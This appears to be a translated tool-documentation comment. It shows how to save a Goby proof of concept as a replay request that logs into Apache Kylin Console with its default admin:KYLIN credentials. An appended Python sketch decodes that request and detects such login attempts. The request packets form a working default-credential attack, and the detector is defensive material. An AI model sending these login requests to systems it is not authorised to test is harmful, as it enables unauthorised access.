How do I use the vulnerability script module?
Is there a custom PoC format? Could you show an example?
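The vulnerability script is a very simple feature: it is essentially a saved request packet from the data replay feature. Here is a simple example. I found a Goby PoC for the Apache Kylin Console weak password, and looking at its JSON file, the key request is as follows: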
```json
"Request": {
  "method": "GET",
  "uri": "/kylin/api/user/authentication",
  "follow_redirect": true,
  "header": {
    "Authorization": "Basic YWRtaW46S1lMSU4=",
    "Cookie": "project=null"
  },
  "data_type": "text",
  "data": ""
},
```
The request method and path are `GET /kylin/api/user/authentication`, the password check is `"Authorization": "Basic YWRtaW46S1lMSU4="`, and the cookie is `"Cookie": "project=null"`. From this you can construct a raw data replay packet:
```http
GET /kylin/api/user/authentication HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.64
Authorization: Basic $<Base64>admin:KYLIN</Base64>$
Cookie: project=null
```
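Then click save request, and this forms a simple Exp. To call it, you only need to double-click it in the vulnerability scripts area; the target to run against is set in the parameter configuration panel on the right.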
Apache Kylin Console 控制台弱口令.exp
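In practice I have actually found that although this feature is simple, you basically have to write the exps yourself... which is relatively difficult. I have already started looking for libraries with a rich set of exps and PoCs and plan to make them compatible for calling, so that people don't have to write their own and can just use ready-made ones.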
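Added example, not part of the original comment or the project's code: the sketch below expands the `$<Base64>` tag from the replay packet (assumed here to mean "Base64-encode the enclosed text") to show that it yields the same `Authorization` value as the Goby JSON, then uses that to flag captured requests that try the `admin:KYLIN` login on this endpoint. The function names and the shortened sample request are constructed for illustration.

```python
import base64
import binascii
import re

# Values taken from the request shown in the comment above.
KYLIN_AUTH_PATH = "/kylin/api/user/authentication"
DEFAULT_CREDS = ("admin", "KYLIN")

# Assumed semantics of the tool's tag: $<Base64>text</Base64>$ is replaced
# by the Base64 encoding of the enclosed text when the request is sent.
_TAG = re.compile(r"\$<Base64>(.*?)</Base64>\$", re.S)

def expand_base64_tags(template: str) -> str:
    return _TAG.sub(lambda m: base64.b64encode(m.group(1).encode()).decode(), template)

def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, lower-cased headers)."""
    lines = raw.strip().splitlines()
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers

def basic_credentials(header_value: str):
    """Return (user, password) from a Basic header, or None if malformed."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None

def is_default_kylin_login(raw: str) -> bool:
    _, path, headers = parse_request(raw)
    creds = basic_credentials(headers.get("authorization", ""))
    return path == KYLIN_AUTH_PATH and creds == DEFAULT_CREDS

# Constructed sample: the replay template from the comment, shortened.
TEMPLATE = (
    "GET /kylin/api/user/authentication HTTP/1.1\n"
    "Authorization: Basic $<Base64>admin:KYLIN</Base64>$\n"
)
```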